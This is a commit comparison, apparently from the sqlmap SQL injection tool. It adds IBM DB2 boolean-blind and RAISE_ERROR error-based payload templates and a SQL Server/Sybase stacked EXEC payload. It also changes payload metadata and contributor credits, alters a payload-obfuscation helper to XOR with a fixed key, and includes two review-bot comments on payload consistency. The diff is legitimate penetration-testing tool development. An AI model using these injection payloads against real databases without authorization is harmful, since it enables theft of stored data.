Compare commits
22 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
459130196a | ||
|
|
0a8a65bc0b | ||
|
|
5d370f2fa1 | ||
|
|
1296336e18 | ||
|
|
75b3736467 | ||
|
|
282eb7e533 | ||
|
|
f28d82c119 | ||
|
|
74603c5530 | ||
|
|
050700f079 | ||
|
|
31bf1fc6b6 | ||
|
|
d4d83b29f0 | ||
|
|
596fff48ad | ||
|
|
56ff081314 | ||
|
|
69421b4806 | ||
|
|
3910b86853 | ||
|
|
bbdedb39f9 | ||
|
|
d0be782ece | ||
|
|
16c8673e98 | ||
|
|
1dedc36d85 | ||
|
|
c1d46c95ed | ||
|
|
d5fc2c9350 | ||
|
|
c28ad8fcd8 |
@@ -213,6 +213,15 @@ Formats:
|
|||||||
<suffix> AND ((('[RANDSTR]' LIKE '[RANDSTR]</suffix>
|
<suffix> AND ((('[RANDSTR]' LIKE '[RANDSTR]</suffix>
|
||||||
</boundary>
|
</boundary>
|
||||||
|
|
||||||
|
<boundary>
|
||||||
|
<level>2</level>
|
||||||
|
<clause>1</clause>
|
||||||
|
<where>1,2</where>
|
||||||
|
<ptype>3</ptype>
|
||||||
|
<prefix>%'</prefix>
|
||||||
|
<suffix> AND '[RANDSTR]%'='[RANDSTR]</suffix>
|
||||||
|
</boundary>
|
||||||
|
|
||||||
<boundary>
|
<boundary>
|
||||||
<level>2</level>
|
<level>2</level>
|
||||||
<clause>1</clause>
|
<clause>1</clause>
|
||||||
|
|||||||
@@ -824,7 +824,6 @@ Tag: <test>
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -845,7 +844,6 @@ Tag: <test>
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -1193,7 +1191,6 @@ Tag: <test>
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -1214,7 +1211,6 @@ Tag: <test>
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -1332,6 +1328,44 @@ Tag: <test>
|
|||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>IBM DB2 boolean-based blind - ORDER BY clause</title>
|
||||||
|
<stype>1</stype>
|
||||||
|
<level>4</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>3</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>,(SELECT CASE WHEN [INFERENCE] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</vector>
|
||||||
|
<request>
|
||||||
|
<payload>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<comparison>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</comparison>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>IBM DB2</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>IBM DB2 boolean-based blind - ORDER BY clause (original value)</title>
|
||||||
|
<stype>1</stype>
|
||||||
|
<level>5</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>3</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>,(SELECT CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</vector>
|
||||||
|
<request>
|
||||||
|
<payload>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<comparison>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</comparison>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>IBM DB2</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
<!-- Works in MySQL, Oracle, etc. -->
|
<!-- Works in MySQL, Oracle, etc. -->
|
||||||
<test>
|
<test>
|
||||||
<title>HAVING boolean-based blind - WHERE, GROUP BY clause</title>
|
<title>HAVING boolean-based blind - WHERE, GROUP BY clause</title>
|
||||||
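Review bot: The two new IBM DB2 boolean-based tests pass the SQLSTATE to RAISE_ERROR unquoted (`RAISE_ERROR(70001, '[RANDSTR]')` in `<vector>`, `<payload>` and `<comparison>`), while the DB2 error-based tests added in the same compare use the quoted form `RAISE_ERROR('70001', ...)`. RAISE_ERROR's first argument is documented as a five-character string, so the unquoted integer depends on implicit casting being available on the targeted DB2 version; quoting it in both tests, `RAISE_ERROR('70001', '[RANDSTR]')`, keeps the payloads consistent with the error-based ones and avoids a server-side type error turning every probe into a false negative.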
@@ -1452,7 +1486,6 @@ Tag: <test>
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -1474,7 +1507,6 @@ Tag: <test>
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
|||||||
@@ -404,7 +404,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -425,7 +424,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -446,7 +444,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -467,7 +464,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -488,7 +484,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -509,7 +504,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -672,7 +666,7 @@
|
|||||||
<stype>2</stype>
|
<stype>2</stype>
|
||||||
<level>3</level>
|
<level>3</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>1,9</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
<vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||||
<request>
|
<request>
|
||||||
@@ -689,9 +683,9 @@
|
|||||||
<test>
|
<test>
|
||||||
<title>Firebird OR error-based - WHERE or HAVING clause</title>
|
<title>Firebird OR error-based - WHERE or HAVING clause</title>
|
||||||
<stype>2</stype>
|
<stype>2</stype>
|
||||||
<level>3</level>
|
<level>4</level>
|
||||||
<risk>3</risk>
|
<risk>3</risk>
|
||||||
<clause>1,9</clause>
|
<clause>1</clause>
|
||||||
<where>2</where>
|
<where>2</where>
|
||||||
<vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
<vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||||
<request>
|
<request>
|
||||||
@@ -710,7 +704,7 @@
|
|||||||
<stype>2</stype>
|
<stype>2</stype>
|
||||||
<level>3</level>
|
<level>3</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>1,9</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
<vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||||
<request>
|
<request>
|
||||||
@@ -727,9 +721,9 @@
|
|||||||
<test>
|
<test>
|
||||||
<title>MonetDB OR error-based - WHERE or HAVING clause</title>
|
<title>MonetDB OR error-based - WHERE or HAVING clause</title>
|
||||||
<stype>2</stype>
|
<stype>2</stype>
|
||||||
<level>3</level>
|
<level>4</level>
|
||||||
<risk>3</risk>
|
<risk>3</risk>
|
||||||
<clause>1,9</clause>
|
<clause>1</clause>
|
||||||
<where>2</where>
|
<where>2</where>
|
||||||
<vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
<vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||||
<request>
|
<request>
|
||||||
@@ -748,7 +742,7 @@
|
|||||||
<stype>2</stype>
|
<stype>2</stype>
|
||||||
<level>3</level>
|
<level>3</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>1,8,9</clause>
|
<clause>1</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC)</vector>
|
<vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC)</vector>
|
||||||
<request>
|
<request>
|
||||||
@@ -765,9 +759,9 @@
|
|||||||
<test>
|
<test>
|
||||||
<title>Vertica OR error-based - WHERE or HAVING clause</title>
|
<title>Vertica OR error-based - WHERE or HAVING clause</title>
|
||||||
<stype>2</stype>
|
<stype>2</stype>
|
||||||
<level>3</level>
|
<level>4</level>
|
||||||
<risk>3</risk>
|
<risk>3</risk>
|
||||||
<clause>1,8,9</clause>
|
<clause>1</clause>
|
||||||
<where>2</where>
|
<where>2</where>
|
||||||
<vector>OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC)</vector>
|
<vector>OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC)</vector>
|
||||||
<request>
|
<request>
|
||||||
@@ -780,6 +774,45 @@
|
|||||||
<dbms>Vertica</dbms>
|
<dbms>Vertica</dbms>
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>IBM DB2 AND error-based - WHERE or HAVING clause</title>
|
||||||
|
<stype>2</stype>
|
||||||
|
<level>3</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>1</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>AND [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||||
|
<request>
|
||||||
|
<payload>AND [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>IBM DB2</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>IBM DB2 OR error-based - WHERE or HAVING clause</title>
|
||||||
|
<stype>2</stype>
|
||||||
|
<level>4</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>1</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||||
|
<request>
|
||||||
|
<payload>OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>IBM DB2</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
<!--
|
<!--
|
||||||
TODO: if possible, add payload for SQLite, Microsoft Access,
|
TODO: if possible, add payload for SQLite, Microsoft Access,
|
||||||
and SAP MaxDB - no known techniques at this time
|
and SAP MaxDB - no known techniques at this time
|
||||||
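Review bot: The new `IBM DB2 OR error-based - WHERE or HAVING clause` test is tagged `<risk>1</risk>` and `<where>1</where>`, whereas every other OR error-based test in this file (Firebird, MonetDB, Vertica) carries `<risk>3</risk>` and `<where>2</where>`. An OR-prefixed vector changes which rows the enclosing statement matches, which appears to be why the existing OR tests are rated risk 3 and run with the replaced value; unless DB2 is deliberately treated differently, the new entry should read `<risk>3</risk>` and `<where>2</where>`. The AND variant directly above it is consistent with its Firebird/MonetDB/Vertica counterparts and needs no change.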
@@ -1000,7 +1033,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -1021,7 +1053,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -1062,6 +1093,25 @@
|
|||||||
<dbms>Firebird</dbms>
|
<dbms>Firebird</dbms>
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>IBM DB2 error-based - Parameter replace</title>
|
||||||
|
<stype>2</stype>
|
||||||
|
<level>4</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>1,3</clause>
|
||||||
|
<where>3</where>
|
||||||
|
<vector>RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||||
|
<request>
|
||||||
|
<payload>RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>IBM DB2</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
<!-- End of error-based tests - Parameter replace -->
|
<!-- End of error-based tests - Parameter replace -->
|
||||||
|
|
||||||
<!-- Error-based tests - ORDER BY, GROUP BY clause -->
|
<!-- Error-based tests - ORDER BY, GROUP BY clause -->
|
||||||
@@ -1205,7 +1255,6 @@
|
|||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>PostgreSQL error-based - ORDER BY, GROUP BY clause</title>
|
<title>PostgreSQL error-based - ORDER BY, GROUP BY clause</title>
|
||||||
<stype>2</stype>
|
<stype>2</stype>
|
||||||
@@ -1261,7 +1310,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -1289,7 +1337,7 @@
|
|||||||
<stype>2</stype>
|
<stype>2</stype>
|
||||||
<level>5</level>
|
<level>5</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>2,3</clause>
|
<clause>3</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<vector>,(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))</vector>
|
<vector>,(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))</vector>
|
||||||
<request>
|
<request>
|
||||||
@@ -1302,9 +1350,51 @@
|
|||||||
<dbms>Firebird</dbms>
|
<dbms>Firebird</dbms>
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>IBM DB2 error-based - ORDER BY clause</title>
|
||||||
|
<stype>2</stype>
|
||||||
|
<level>5</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>3</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>,RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||||
|
<request>
|
||||||
|
<payload>,RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>IBM DB2</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
<!--
|
<!--
|
||||||
TODO: if possible, add payload for SQLite, Microsoft Access
|
TODO: if possible, add payload for SQLite, Microsoft Access
|
||||||
and SAP MaxDB - no known techniques at this time
|
and SAP MaxDB - no known techniques at this time
|
||||||
-->
|
-->
|
||||||
<!-- End of error-based tests - ORDER BY, GROUP BY clause -->
|
<!-- End of error-based tests - ORDER BY, GROUP BY clause -->
|
||||||
|
|
||||||
|
<!-- Error-based tests - stacking -->
|
||||||
|
<test>
|
||||||
|
<title>Microsoft SQL Server/Sybase error-based - Stacking (EXEC)</title>
|
||||||
|
<stype>2</stype>
|
||||||
|
<level>2</level>
|
||||||
|
<risk>1</risk>
|
||||||
|
<clause>1-8</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>;DECLARE @[RANDSTR] NVARCHAR(4000);SET @[RANDSTR]=(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]');EXEC @[RANDSTR]</vector>
|
||||||
|
<request>
|
||||||
|
<payload>;DECLARE @[RANDSTR] NVARCHAR(4000);SET @[RANDSTR]=(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]');EXEC @[RANDSTR]</payload>
|
||||||
|
<comment>--</comment>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
|
<dbms>Sybase</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
<!-- End of error-based tests - stacking -->
|
||||||
</root>
|
</root>
|
||||||
|
|||||||
@@ -73,7 +73,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
|||||||
@@ -264,7 +264,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -286,7 +285,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -307,7 +305,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -328,7 +325,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
|||||||
@@ -588,7 +588,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -610,7 +609,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -631,7 +629,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -652,7 +649,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -674,7 +670,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -696,7 +691,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -1638,7 +1632,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
@@ -1936,7 +1929,6 @@
|
|||||||
<details>
|
<details>
|
||||||
<dbms>Microsoft SQL Server</dbms>
|
<dbms>Microsoft SQL Server</dbms>
|
||||||
<dbms>Sybase</dbms>
|
<dbms>Sybase</dbms>
|
||||||
<os>Windows</os>
|
|
||||||
</details>
|
</details>
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
|
|||||||
@@ -112,6 +112,9 @@ Alessio Dalla Piazza, <alessio.dallapiazza(at)gmail.com>
|
|||||||
Sherif El-Deeb, <archeldeeb(at)gmail.com>
|
Sherif El-Deeb, <archeldeeb(at)gmail.com>
|
||||||
* for reporting a minor bug
|
* for reporting a minor bug
|
||||||
|
|
||||||
|
Thomas Etrillard, <thomas.etrillard(at)synacktiv.com>
|
||||||
|
* for contributing the IBM DB2 error-based payloads (RAISE_ERROR)
|
||||||
|
|
||||||
Stefano Di Paola, <stefano.dipaola(at)wisec.it>
|
Stefano Di Paola, <stefano.dipaola(at)wisec.it>
|
||||||
* for suggesting good features
|
* for suggesting good features
|
||||||
|
|
||||||
@@ -317,6 +320,9 @@ Michael Majchrowicz, <mmajchrowicz(at)gmail.com>
|
|||||||
Vinícius Henrique Marangoni, <vinicius_marangoni1(at)hotmail.com>
|
Vinícius Henrique Marangoni, <vinicius_marangoni1(at)hotmail.com>
|
||||||
* for contributing a Portuguese translation of README.md
|
* for contributing a Portuguese translation of README.md
|
||||||
|
|
||||||
|
Francesco Marano, <francesco.mrn24(at)gmail.com>
|
||||||
|
* for contributing the Microsoft SQL Server/Sybase error-based - Stacking (EXEC) payload
|
||||||
|
|
||||||
Ahmad Maulana, <matdhule(at)gmail.com>
|
Ahmad Maulana, <matdhule(at)gmail.com>
|
||||||
* for contributing a tamper script halfversionedmorekeywords.py
|
* for contributing a tamper script halfversionedmorekeywords.py
|
||||||
|
|
||||||
|
|||||||
@@ -19,28 +19,26 @@ from optparse import OptionParser
|
|||||||
|
|
||||||
if sys.version_info >= (3, 0):
|
if sys.version_info >= (3, 0):
|
||||||
xrange = range
|
xrange = range
|
||||||
|
ord = lambda _: _
|
||||||
|
|
||||||
def hideAscii(data):
|
KEY = b"Beeth7hoyooleeF0"
|
||||||
retVal = b""
|
|
||||||
for i in xrange(len(data)):
|
|
||||||
value = data[i] if isinstance(data[i], int) else ord(data[i])
|
|
||||||
retVal += struct.pack('B', value ^ (127 if value < 128 else 0))
|
|
||||||
|
|
||||||
return retVal
|
def xor(message, key):
|
||||||
|
return b"".join(struct.pack('B', ord(message[i]) ^ ord(key[i % len(key)])) for i in range(len(message)))
|
||||||
|
|
||||||
def cloak(inputFile=None, data=None):
|
def cloak(inputFile=None, data=None):
|
